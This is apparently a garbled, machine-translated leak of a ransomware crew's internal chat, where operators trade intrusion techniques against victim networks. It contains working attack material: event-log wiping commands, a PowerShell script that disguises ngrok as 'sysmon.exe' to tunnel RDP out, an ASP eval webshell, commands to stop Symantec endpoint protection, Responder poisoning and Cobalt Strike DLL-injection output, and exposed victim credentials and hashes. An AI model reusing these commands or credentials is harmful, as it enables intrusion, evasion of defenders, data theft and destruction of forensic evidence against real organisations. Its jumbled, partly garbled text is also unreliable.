re-negotiate the connection and upgrade it so that
all subsequent communications are fully encrypted.
- If action=bypass, the remote computer group must be specified when dir=i
n.
- If service=any, the rule applies only to services.
- The ICMP type or code can be "any".
- Edge can only be specified for inbound rules.
- AuthEnc and authnoencap cannot be used together.
- Authdynenc is valid only when dir=in.
- When authnoencap is set, the security=authenticate option becomes an
optional parameter.
Examples:
Add an inbound rule with no encapsulation security for browser.exe:
netsh advfirewall firewall add rule name="allow browser"
dir=in program="c:\programfiles\browser\browser.exe"
security=authnoencap action=allow
Add an outbound rule for port 80:
netsh advfirewall firewall add rule name="allow80"
protocol=TCP dir=out localport=80 action=block
Add an inbound rule requiring security and encryption
for TCP port 80 traffic:
netsh advfirewall firewall add rule
name="Require Encryption for Inbound TCP/80 traffic
protocol=TCP dir=in localport=80 security=authdynenc
action=allow
Add an inbound rule for browser.exe and require security
netsh advfirewall firewall add rule name="allow browser"
dir=in program="c:\program files\browser\browser.exe"
security=authenticate action=allow
Add an authenticated firewall bypass rule for group
acmedomain\scanners identified by an SDDL string:
netsh advfirewall firewall add rule name="allow scanners"
dir=in rmtcomputergrp= action=bypass
security=authenticate
Add an outbound allow rule for local ports 5000-5010 for udp-
Add rule name="Allow port range" dir=out protocol=udp localport=5000-5010
action=allow
C:\Windows\system32>
``not for bots[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=dx2BCrmbMDc7M3gAY) it's more for your workstations cleaning if you have it, all logs leak there and you can't clean them that way
if not, then the logs are stored literally a couple of days, after loca forenziki more likely to pick up the logs of network equipment, and not the winnings clearing winnings logs absolutely useless exercise@all have a file on msf tcp_rc4 listener? clean of course)4 @atombatnik for cleaning logs can also do so
``for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1"
``````
Cleaning Logs
1 Run the PowerShell console with administrator privileges and use the following command to list all the classic event logs available on the system with their maximum size and the number of events in them.
Get-EventLog -LogName *
2 To clear all event logs, we would have to redirect the log names to the pipeline, but unfortunately this is not allowed. So we have to use the ForEach loop:
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
3 For the event handling in Windows there is a powerful command line utility WevtUtil.exe available for quite some time.
To display a list of logs registered in the system, run the command:
WevtUtil enum-logs
Clearing events in a particular log is done as follows:
WevtUtil cl Setup
Before clearing, you can back up the events in the logbook by saving them to a file:
WevtUtil cl Setup /bu:SetupLog_Bak.evtx
To clear all logs at once, you can use the Powershell commandlet Get-WinEvent to get all the log objects and Wevtutil.exe to clear them:
Get-WinEvent -ListLog * -Force | % { Wevtutil.exe cl $_.LogName }
or like this
Wevtutil el | ForEach { wevtutil cl "$_"}
4 Log clearing can also be done from the classic command line:
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Log Cleaner Batnick
PHP:
break>"%CD%\server_log.txt"
break>"%CD%\logs\errors.log"
break>"%CD%\logs\log-core.log"
break>"%CD%\logs\warnings.log"
break>"%CD%\logs\plugins\mysql.log"
Clear all Windows Event Viewer logs
1. CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
2. powerShell
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
``okhwaiting for you there? Finally, everything is working fine Somebody already had this problem, I wrote to steven, maybe he can fix it Maybe I do not have enough rights to email? Well, if there will be a grid, we will dodost to cobalt no rights raised, no one has not shown anything yet raised rights?and what have you done? job on the cobait I found a bug, how to open the PM messages if they are not read (in the rocket), if anyone has such a problem in the future, please contact:) I would like to get a job, on the cobalt to workprivet. Eliminated the problem, tell me what to do, what I need to do, maybe some manuals, or to train on what can be? i have no idea what to do. i must try all possible options :) i do not know how to help i did not have this problem notification skips in the bottom corner and have time to read, but in the chat is displayed as unread and i can not open it, i can not open new messages, and older only open on the bug, i do not know what the hell, maybe i need to update something.. zto what he wrote before opened, the last two messages are hanging)) you just need the messages?Hi, I need to try the settings, messages are not readenenHi, checking connections, write something, two days we fuckin' do not understand what the problem is :) I'll try to figure it out, write it down I have no problems honestly chzvitsya as unread, but can not see you zhmoi read did not understand) hi, first need to figure out why I do not see messages in personal chat, only notifications fly through quicklywhich you need to teach?Hi, I'm all ready to go! restoring my computer after cleaning and formatting softswitch and otpisheponya, I will storm him) well it's okay, already wrote, silent popeishish steve if they did not give anything did not give him yet? hello +
any other ideas? ootlok during working hours people don't sit on their work computers. they seem to get fucked up about it... everyone uses smart phones... well except for work email... but it all depends on the office...
ups, dhl, royalmail++ are good options
add more, don't be shy )) newsmagazine users from the networks (work computers) @lexman @all tell me exactly what users Facebook, google, youtube, tiktok, netflix@all gentlemen pentesters, what sites or topics (not related to work) most often visited by corporate english speaking users? and immediately a question - and what does the girl with the daughter have to do with it?
the girl is a backup or something ahahahh i saw a congratulation from kaspersky labs somewhere today
girl with daughter walking through the woods and wrote "all administrators happy bekap day!"amen)congratulations to all with bekap day :smile:npa, I see spstut lies, do a search on the conference files or tell me where it lieswho has a sonic session checker compiled in the ehe? there is a fresh casehas to find an old granny with a vegetable garden)[ ](https://stylebrooks.com/group/general?msg=7TpZwjj8ZqehSCSre) Yes pomoyu at myself, but not sure, I personally use vmku debian crypto + elektrum via tor proxy, cid phrase buried at the granny in the gardenPlease advise on bitcoin storage
not store bitcoin at all?
the best option is a clean OS and electrum with backups ?
Aparthot wallet sounds cool, but if there comes an abuzz, you can stay without money - is that correct?
Rewrite it on Windows >Collecting all kinds of manuals there
who to add chat in the personal - will add#all_manualsPlay somewhere flashed man how to find the right process for all servers in the domain in particular sqlservr , can duplicate pliz in Ls@all write to the confab where appropriate sessions will passedvshe Hi, how do you solve the unloading of mailboxes if the mail server is not enough space? Who met with UrBackup? How do I determine where the backups go? In the folder looked around, the only thing I found, hints of linux.In the current case is such a thing, on the fs more than a million directories, all in French and German, to sort it out by hand quest unreal. That's why I first started using the software
WizTree, to create statistics of directories and filetypes, and now bypassing fucking crap, we pack the necessary files, for example, this command archives all pdf with X 7z a -tzip Y:\pdf.7z -ir!X:\*.pdfI have this idea - you can use as an alternative to rclone
Search by file mask excluding mp3 wav exe dll sys etc. + by date, pop up on the left menu and upload to sftp... http://seo-ng.net/seo-statiy/more/poisk-v-total-commander.html@all are there anyone without cases? https://askubuntu.com/questions/648555/bash-program-cannot-execute-binary-file-exec-format-error
ou're trying to run an executable compiled for an ARM architecture on an x86-64 architecture, which is much like asking your processor who only speaks English to take directions in Chinese.
seems to be compiled for ARM build, I tried to run it but nothing, I thought it was because of Java, I tried 3 versions, no way)
no working software for a particular lin seems to be, or 32 bit compiled or I do not know)bash: ./check-sonik: cannot execute binary file: Exec format egorponjaloalo fresh new sessions nagaetaaa it to that information that goes with the case it needs freshwhich you have from the archive which is in the confine lies the path to the file sessions.jsona where to get how to use)
" [path to sessions.json]
you have to write in the above linemanual from Code, just follow the instructions on how to use chesk-sonik.zip
Code March 16, 2021 5:58 PM
./check-sonik [site.com] [path to sessions.json]
At the end will output sessions with cookie tokens ready, no need to do btoa, here's an example:
User: jasmijn.maertens Password: Jmij310s455172 B64 token:MXJ4UHpXSXRGVVUxrRFV5a2U1aU1GRnNXZG5FZEVCSkVNMldJU3dWM2I4QT0=at least one, but this is the minimum call to support and dismantle all pk or where in my case was so, even after a complete shutdown inveigh'a
tried responder -I ppp0 -rdw -v tried it both 1st and 2nddid not catch anything right now, ifconfig oot@kali:/home/kali/Desktop# ifconfig
"eth0: flags=4163 mtu 1500
"inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
" inet6 fe80::a00:27ff:fe5c:6526 prefixlen 64 scopeid 0x20
" ether 08:00:27:5c:65:26 txqueuelen 1000 (Ethernet)
"RX packets 9064 bytes 6293746 (6.0 MiB)
"RX errors 0 dropped 0 overruns 0 frame 0
"TX packets 6950 bytes 572052 (558.6 KiB)
" TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
"
" lo: flags=73 mtu 65536
" inet 127.0.0.1 netmask 255.0.0.0
" inet6 ::1 prefixlen 128 scopeid 0x10
" loop txqueuelen 1000 (Local Loopback)
" RX packets 40 bytes 2240 (2.1 KiB)
" RX errors 0 dropped 0 overruns 0 frame 0
"TX packets 40 bytes 2240 (2.1 KiB)
" TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
"
"ppp0: flags=4305 mtu 1280
" inet 192.168.149.140 netmask 255.255.255.255 destination 192.0.2.1
" ppp txqueuelen 3 (Point-to-Point Protocol)
" RX packets 6 bytes 98 (98.0 😎
" RX errors 0 dropped 0 overruns 0 frame 0
"TX packets 5 bytes 54 (54.0 😎
"TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:/home/kali/Desktop# responder -I ppp0 -rdwv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
|
| -|__ --| | | | || -| _|
|__| |_____|_____| |
___|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.2.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [ppp0]
Responder IP [192.168.149.140]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
and it's not catching anything.
on the VPN interface, right?" ppp0: flags=4305 mtu 1280
"inet 192.168.149.140 netmask 255.255.255.255 destination 192.0.2.1
start like this responder -I ppp0 -rdwv what conditions?
axis, interfaces
on the virtual machine you get two local ranges probably and invei/responder works on the "first" local one guys, responder inveih, on the virtual box does not work but on the grandfather connected to the grid does, why does not work on the virtual machine connected to the grid?all got it, there artifact work koba someone did stage cna for bacon? @all who needs in the next hour and a half to redo the session - throw ipaks in the appropriate configurations who already did that?
```
https://github.com/p3nt4/Invoke-SocksProxy
https://github.com/tokyoneon/Invoke-SocksProxy/
``OK, thanks@steven ask himHello, who can decrypt the hash?
```BC98FFCB81EC7BC81C7C8BAE6292BCBE```
I can't get cmd5 and I need the passkey. Or maybe another service in mind? Who has an account on Zoom info, share plzPisplayed in PM.@all guys who viams decrypted, in pm plz, a couple of questions have@Air poured the date here pour
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
``@Air give me hell here, thank you, I will put you in the group hello, alter asked to write off who is available to teammates, I do not do anything yet konkretnymesheskikh servoki localyya ekshi build vzhelemGod, who ``ESXi` servoki `nix` version local, knock in the personal, please.alex hasn't been heard since friday, gone somewhere, i have been watching him not always, but he is cheating almost alwaysHi
Does the Kaspersky dll injector work? Or does it work ?[ ](https://stylebrooks.com/group/discussion?msg=EDMeyq7jo7BZxma9r) give details in a personal if there is a YES - we can finish upgmer once killed him, but only in 1 network worked, apparently was badly configured, but the admin palil after thatPareni! against Cylance edr is meaningful to fight?i can't see it in the new rocket1 minszczady i'll see it in the new rocket, i can't leak it without a "jump?" what's the problem with remote dumping lsaas? on the 24th of march?
Who in our brute force team can help?
salt hashes
https://en.wikipedia.org/wiki/Salt_(cryptography), tomorrow i'll sit down to test something to change the injector cobalt slightly more advanced avs have been stinging for a long time
but this is the first time I've seen defender scorch everything, good evening koba?
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 219946 bytes
[+] received output:
EntryPoint found
[+] received output:
Injected.
```
with parameters -m local everything works great on the machine with the session (injector,massinjector)yes, near the corresponding .cna script before you had to put it in the cobalt diru tell me where to replace these boff files, where to put)? ah, ok))) and now they will work even better they workedwait, and if injectors worked?) just replace them and everything should start
the only Bofy cna not changed? oh_o found@all Urgent update your BOF files injector, builds that are in work since monday this week with the old injector will NOT start and do not forget to reload do .cna script@all IMPORTANT
ARTIFACT KIT UPDATE
everyone download the archive and replace the files in the folder "over", all files! kkrinter@alter @prince addit kto know how to know what will be the size of the folder with the files for the last 2 years for example? that from the total mass of files to estimate the future size?I'll hook you up with alex and give you the net. now it's ok. everything should be ok. now just log in. i can't. i have to take the trouble to read your messages. maybe i don't have enough rights to write in private? i should see why i can't see your messages in private, but in groups all is ok. wait 10-15 minutes. i will hook you up with someone else. hi, i remember. got any work to do for practice? and the vpn's about to be stripped downgotbots are here1.com@all beep, who worked with hashtag, dictionaries. need a little advice@atom write eldorado he might know@Airzaley fucking data we're trying to make money on this, seriously?it is not re-scheduled what? transferred? if so - add please @jask where did you pour? do not see on the server can:) thought myself in the code lost / lost)) A) written script lost. I udmay have asked) \and what lost? Got it, thanks.Yes, I wrote, lost.create a database where NTLM is the id, and match the
Googling, tons of options...write a script, a simple one, whatever, there are 3-5 lines of comparison and matching...Gentlemen, advise me, maybe there is a solution not by hand.
I have two files.
First one with lots of lines in format `USER:NTLM`, second one with less number of lines in format `NTLM:PASSWORD`.
How to combine what would end up being `USER:PASS`? = )well yeah you can do that with psyngect, is there any compiled software on sharps? and what's this for?
it turns out no one is listening to me
so I'll say it again
to all of you with eyes and ears
before locking up, use the home run session gopher
https://github.com/Arvanaghi/SessionGopher
To run remotely (-iL, -AllDomain, -Target)[ ](https://stylebrooks.com/group/general?msg=7tCjveXyDBBxXs3yy) dump @steven in pmpom help with hash: d62fdc9dfa81e87e27baa523266bd3e2
thanks)@t3chnolog sorry, didn't know. My respects! :) when you hang the service console output does not ktokno kmd opens when you just start Ngrok, this is the usual console outputThis is my script tastemtanapis in pm)Under yourself, just change the need, if you do not understand - beep PM, I will help you.``
mkdir "C:\Windows\tmp"
# Download NGROK
$clnt = new-object System.Net.WebClient
$url = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
$file = "C:\Windows\tmp\ngrok.zip"
$clnt.DownloadFile($url,$file)
# Unzip NGROK
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C://Windows\tmp\")
$destination.Copyhere($zip_file.items())
#Download NSSM
$clnt = new-object System.Net.WebClient
$url = "http://nssm.cc/release/nssm-2.24.zip"
$file = "C:\Windows\tmp\nssm.zip"
$clnt.DownloadFile($url,$file)
#Unzip NSSM
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
$destination = $shell_app.namespace("C://Windows\tmp")
$destination.Copyhere($zip_file.items())
Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"
echo 'authtoken: 1nkQQQOeCRwXSyjxVs1jCOvlQ6XQ_s2fbYS124PZwt36bUVP5
tunnels:
default:
proto: tcp
addr: 3389' > "C:\Windows\tmp\config.yml"
cd "C:\Windows\tmp\nssm-2.24\win64"
.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config="C:\Windows\tmp\config.yml"
Start-Service sysmon
```
I have a connection to the ngp in the background, when I start the output in the cmd, and when you close the tunnel falls, and so should it be? @all write in confes where to reshoot the session, now we will try[ ](https://stylebrooks.com/group/general?msg=SpC3HH2sqgzCCqMRG) wait above )):rocket:hey all. someone rolled up a veeam on a dedicated?
pm plz $50k BTC-USD, gentlemen! :)Gentlemen, good evening everyone!
Has anyone encountered Datto? has anyone worked through ipv6? and what are the legitimate ways to remove ntds now? i usually run through exchange. One of the most survivable backdoors. no php there.
I don't know about the obfuscated code, it will probably work, I don't know how to do it. is obfuscated code also dumped? often on servers with aspx, maybe pxp is up there, you can also dump a pxp webshell...thanks
check it out again
i've solved this problem long ago - i used a legitimate file explorer, and then i uploaded the one that is not stolen by the aver
I'm looking for the easiest way which will be close to fudumassa optionshttp://github.com/tennc/webshell/tree/master/asrprosto also never worked with ASP, but judging by the context so...well you need to pass the command parameters, like cmd=dirS ASP not worked, but apparently yes.Who knows a little about ASP coding?
``` <% eval request("cmd") %>
```
Is this code just GET / POST code in CMD?
thanks[ ](https://stylebrooks.com/group/general?msg=SQdkRoqS256EjYEJc) pm@all have a working email on proton?
"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop
tried it yesterday, it asked for password@all please note it does not work like that anymore = (
the old bug - removed khadyCrowdStrike pomoymu change the name of the dir and rebootSimantec command abovedefender gpok as AV stew listen and ask pliz notes hisponyal - ok) asked what would not screw up servaks) spasibparu days hangs all is wellvse window comepara new servers on the new profileParni, all hi! Was the topic that flew sessions kgbschih. At the time when it was massive, I bypassed, and now flies - a terrible nuisance. Solved by changing the profile? Or I remembered something wrong with the password is extinguished as follows.
``"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\smc.exe" -stop
``Has anybody had any experience with removing ntds from the nix cd? I'm sorry I misunderstood. I don't need templates. What exactly do I need to download? can somehow, but I did not understand, usually the tool does itopolyubomu they human-like and similar to those we have a pool of similar passwords I mean if you give the program a pool of characters and similar passwords and it will search by pattern + passwords that in Chrome from the administrator you stole passwordsobviously helps passwords from nds decrypt and search 1-2 thousand passwords there hashes for 4 days on brute force and hashkatkonno from there exports hashkdb who knows any password rebuilders for jdb
Duo Security bypassed in the end ? hello, has anyone encountered a Cortex XDR ? Monitoring some kind of av , blocks everything in a row , any activity in the network . Can bring it down can be how then, cut off even the white software to close the processjeremytonylexmanternert3chnologichelloworld123@rozetka from here look. remote-exec did not have time to try) the problem was in DA, namely on these servers, he did not work for some reason, change the token to another DA and all norm started and knocked off)[ ](https://stylebrooks.com/group/discussion?msg=fa8xtobiv8r3Ti3QP) tried remote-exec ?
set command cmd /c ping google.com hmmm maybe the problem is in the pc from which I launch vmik or task, it writes access denied when executed ... how to ping another server on google com or netstat?) Previously done through a task or vmik, threw at the desired server batinny with the commands and the output in txt, but now it does not work, there is still some other option?) This is your server, where you want to get. pinging google com or netstat snimeya sorry read wrong wmic and task does not work, I'm trying to remotely run on another pc to run there bilds indication of the kred just no accessa server look outside?
shell wmic /node:192.168.0.6 /user:Administrator /password:Blue22Sky@@ etcHelp) I want to run koba on other servers, before that was fine, but on one where sql database does not give. Run through wmic and through the task error no access
ERROR:
Description = Access is denied.
The token is from YES and I can access all the disks safely
What's that got to do with it?
I'm gonna have to tell you, they scanned it or something.
fort fuckin' blocked it.
still nothing
nothing can be done yet
``Fort with a default route, someone can tell me how to do it, they say it might help`` route add 192.168.0.0 mask 255.255.0.0 IF 19
Try it this way
If that doesn't work
route add 192.168.0.0 mask 255.255.0.0 10.212.134.110 IF 19
p\s this one doesn't work``.
C:\Users\Administrator>netsh interface ipv4 show interfaces
Idx Met MTU State Name
--- ---------- ---------- ------------ ---------------------------
1 50 4294967295 connected Loopback Pseudo-Interface 1
12 5 5 1500 disconnected Ethernet
13 5 5 1500 disconnected Ethernet 2
14 20 20 1500 connected Ethernet 3
15 5 5 1500 disconnected Ethernet 4
18 20 20 1500 disconnected Ethernet 5
19 1 1392 connected Ethernet 6
C:\Users\Administrator>
``````
C:\Users\Administrator>ipconfig /all
Windows IP Configuration
Host Name ... ... ... : front1
Primary Dns Suffix ... . :
Node Type . . . . . ♪ Hybrid ♪
IP Routing Enabled. . . . No.
WINS Proxy Enabled. .: No
DNS Suffix Search List. .
Ethernet adapter Ethernet 6:
Connection-specific DNS Suffix :
Description . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter
Physical Address. . . . . : 00-09-0F-AA-00-01
DHCP Enabled . . . . ♪ No ♪
Autoconfiguration Enabled . .: Yes
Link-local IPv6 Address . : fe80::4cf6:80d9:8658:d4bc%19(Preferred)
IPv4 Address . . . . .: 10.212.134.110(Preferred)
Subnet Mask . . . . : 255.255.255.255
Default Gateway . . . . :
DHCPv6 IAID . . . . . : 671090959
DHCPv6 Client DUID. : 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C
DNS Servers . . . . . : 192.168.1.40
192.168.1.18
NetBIOS over Tcpip . ♪ Enabled ♪
Ethernet adapter Ethernet 5:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6
.30)
Physical Address. . . . .: 00-09-0F-FE-00-01
DHCP Enabled. . . . ♪ Yes ♪
Autoconfiguration Enabled . .: Yes
Ethernet adapter Ethernet 4:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . . ♪ Intel(R) 82574L Gigabit Network Connectio ♪ .
n #4
Physical Address . . . .: 00-25-90-57-E5-8D.
DHCP Enabled. . . . .: Yes
Autoconfiguration Enabled . .: Yes
Ethernet adapter Ethernet 3:
Connection-specific DNS Suffix :
Description . . . . . . : Intel(R) 82574L Gigabit Network Connectio
n #3
Physical Address . . . .: 00-25-90-57-E5-8A.
DHCP Enabled. . . . .: No
Autoconfiguration Enabled . .: Yes
Link-local IPv6 Address. : fe80::31f5:3b79:943a:4573%14(Preferred)
IPv4 Address. . . . . . 199.241.189.38(Preferred)
Subnet Mask . . . . : 255.255.255.252
Default Gateway . . . . : 199.241.189.37
DHCPv6 IAID . . . . . : 436217232
DHCPv6 Client DUID . . . . : 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C
DNS Servers . . . . . : 192.168.1.40
192.168.1.18
8.8.8.8
8.8.4.4
NetBIOS over Tcpip. .: Enabled
Ethernet adapter Ethernet 2:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . . ♪ Intel(R) 82574L Gigabit Network Connectio ♪ .
n #2
Physical Address. . . . .: 00-25-90-57-E5-8B.
DHCP Enabled. . . . .: Yes
Autoconfiguration Enabled . .: Yes
Ethernet adapter Ethernet:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . . ♪ Intel(R) 82574L Gigabit Network Connectio ♪ .
n
Physical Address. . . . .: 00-25-90-57-E5-8C
DHCP Enabled. . . . .: Yes
Autoconfiguration Enabled . .: Yes
Tunnel adapter isatap.{E36713F6-455F-40D0-AB94-C1C24C36EF31}:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . ♪ Microsoft ISATAP Adapter ♪
Physical Address . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled . . . . .: No
Autoconfiguration Enabled . .: Yes
Tunnel adapter 6TO4 Adapter:
Connection-specific DNS Suffix :
Description . . . . . . : Microsoft 6to4 Adapter
Physical Address . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled . . . . .: No
Autoconfiguration Enabled . . .: Yes
IPv6 Address. . . . : 2002:c7f1:bd26::c7f1:bd26(Preferred)
Default Gateway . . . . : 2002:c058:6301::1
DHCPv6 IAID . . . . : 587202560
DHCPv6 Client DUID . . . . : 00-01-00-01-27-05-06-6F-00-25-90-57-E5-8C
DNS Servers . . . . . : 192.168.1.40
192.168.1.18
8.8.8.8
8.8.4.4
NetBIOS over Tcpip. .: Disabled
Tunnel adapter isatap.{A623B785-E644-477C-BB93-A087554D1E25}:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . ♪ Microsoft ISATAP Adapter #2 ♪
Physical Address . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled . . . . .: No
Autoconfiguration Enabled . . .: Yes
C:\Users\Administrator>
``````
C:\Users\Administrator>route print
===========================================================================
Interface List
19...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
15...00 25 90 57 e5 8d ......Intel(R) 82574L Gigabit Network Connection #4
14...00 25 90 57 e5 8a ......Intel(R) 82574L Gigabit Network Connection #3
13...00 25 90 57 e5 8b ......Intel(R) 82574L Gigabit Network Connection #2
12...00 25 90 57 e5 8c ......Intel(R) 82574L Gigabit Network Connection
1...........................Software Loopback Interface 1
16...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
17...00 00 00 00 00 00 e0 Microsoft 6to4 Adapter
21...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 199.241.189.37 199.241.189.38 40
10.212.134.110 255.255.255.255 On-link 10.212.134.110 257
64.244.144.91 255.255.255.255 199.241.189.37 199.241.189.38 20
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 306
127.255.255.255.255.255.255.255 On-link 127.0.0.1 306
192.168.1.2 255.255.255.255 10.212.134.111 10.212.134.110 1
192.168.1.16 255.255.255.255 10.212.134.111 10.212.134.110 1
199.241.189.36 255.255.255.255.252 On-link 199.241.189.38 276
199.241.189.38 255.255.255.255.255 On-link 199.241.189.38 276
199.241.189.39 255.255.255.255.255 On-link 199.241.189.38 276
240.0.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 199.241.189.38 276
224.0.0.0.0 240.0.0.0 On-link 10.212.134.110 257
255.255.255.255.255.255.255.255 On-link 127.0.0.1 306
255.255.255.255.255.255.255.255 On-link 199.241.189.38 276
255.255.255.255.255.255.255.255.255 On-link 10.212.134.110 257
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 199.241.189.37 20
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
17 1041 ::/0 2002:c058:6301::1
1 306 ::1/128 On-link
17 1010 2002::/16 On-link
17 266 2002:c7f1:bd26::c7f1:bd26/128
On-link
14 276 fe80::/64 On-link
19 261 fe80::/64 On-link
14 276 fe80::31f5:3b79:943a:4573/128
On-link
19 261 fe80::4cf6:80d9:8658:d4bc/128
On-link
1 306 ff00::/8 On-link
14 276 ff00::/8 On-link
19 261 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
C:\Users\Administrator>
``The task is to skip ngrok for further pumping of information.`` Guys, this is my case. But a question for everyone. I have fortic works , pps with white ipac. But not a single server is not climbing and not one server is not pinged. I tried to change the ip address manually but said I have it all right. How to be an idea ?Guys, this is my case. But a question for everyone. I have a fortic is working , pps with a white ipac. But no one server does not get on and no one server is not pinged. I tried to change the ip address manually but said I have it all right. How to be there are ideas ?Or how prabota this column sesionsda need 1 time to win and then there will be no problem) and work through the rdzhedtoneel just quit canokhek through an hour will be, I can look for more detailsperezvali options and looked for errors on their side changed the kobua I and the domain and without trying to blacklist domains mb.Hello all!!! Guys need your advice.
There is a network - the central point is organized through the VPN.
In the network AV WEBROOT + DEF.
I scanned the network - chose the server machines and flew there.
I let the encrypted DLL - no knock.
Turning off WEBROOT and DEF.
I fired up a SE - no hits.
Exe - no hits.
Checking everything on the other network - everything is OK!
I think maybe Ip do not like it. I change the cobu (without the certificate).
I generate pailoads, I start them up, all bypassed.
Target machine is looking at the internet.
I also disable firewall.
I change the target machine - repeat steps and all without result.
Questions:
1. Why can this happen?
2. What should I do about it?
3. What other options are there for getting a session?
wait for rollback on bitok :) thank you) hit the normal on pp) super) here's another showed ip norm) recently the situation was 1v1 - alt figured out that the conflict of local addresses. optimal - take a VPN with a white apache and clinga another ns server?specify sohostname.domain.comfull hostname.comfull hostname.plskin whatever host entered that he is not in the domain) probably have to enter the rdp in the domain still? thank you try to ask the hostname IP from the dns server 10 2 160 19
then climb on it so there is with the adfinder dns names only, trying to find out ip to ping, no ping) there are also a few ip, they pinged, but do not connect to the rip ``nslookup HOSTNAME 10.2.160.19
``Can you get on a host some so podpodney session or by rndp go to the server quiet and do things =)adfind should be removed from the context of the domain or specify a creed + dk server knocked out suchvpn itself 10.129.25.5 in the local 10.2.160.X go yes it dns in a local case that you attack ? `` DNS Servers . . . . . . . . : 10.2.160.19
10.118.160.201
``din.local is not the domain you're looking for by ipconfig /all
``Hello, I wanted to clarify this question, there is an rdp and vpn from the network. I connect to this rdp to the VPN, all normal connects, run the coba immediately, knocking it off with the ipn vpn. But the server from the adfinder including DK does not ping and does not jump anywhere, in this case, need to enter this rdp in the domain? luna@all content from the folder LLVM overwrite the contents of the folder brooks-artifact-kit
entry points for rundll32.exe for generated dlls
```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``Bug@all all this stuff is in one script, please check functionality and make corrections if possible. If you find or come across something else interesting - add it, I will add it to a common set.
But ONLY what uses cobalt's native functionality, only .CNA files without any extra scripts, otherwise we'll clutter up everything here.
```
## AV_Query
AV_Query scans the registry for installed antiviruses
## upload
An alternate version of the upload command.
Uploads a local file (first argument) to a remote host (second argument, optional).
How to use: __upload [/remote/path/to/file]__.
Example usage: __beacon> upload implant.exe \\DC1\c$\\windows\temp\implant.exe__.
## Blacklist
Blacklist for bacon. Deletes bacon if it is running on a computer where the username and computer are contained in the blacklist.
__blacklist-add__ - add to blacklist
__blacklist-remove__ - remove from the blacklist.
__blacklist-show__ - show blblacklist
## Credpocalypse
Tracks bacon and collects credentials
Bacon usage:
__begin_credpocalypse__ - track current bacon
__end_credpocalypse [all]__ - stop tracking the current/all bacon
__credpocalypse_interval [time]__ - interval of bacon polling 1m, 5m (by default), 10m, 30m, 60m
Use in the script console or another script:
__begin_credpocalypse__ - track all bacon
__end_credpocalypse [all]__stop tracking all bacon
__credpocalypse_interval [time]__ - interval of bacon polling 1m, 5m (by default), 10m, 30m, 60m
Right-click on bacon to bring up the Credpocalypse menu
## powershell2
An alternate version of the powershell command with enhanced operational security
## Simple Beacon console status bar
Shows the working directory, changes the width of the last bacon indicator in the lower right corner to a fixed width
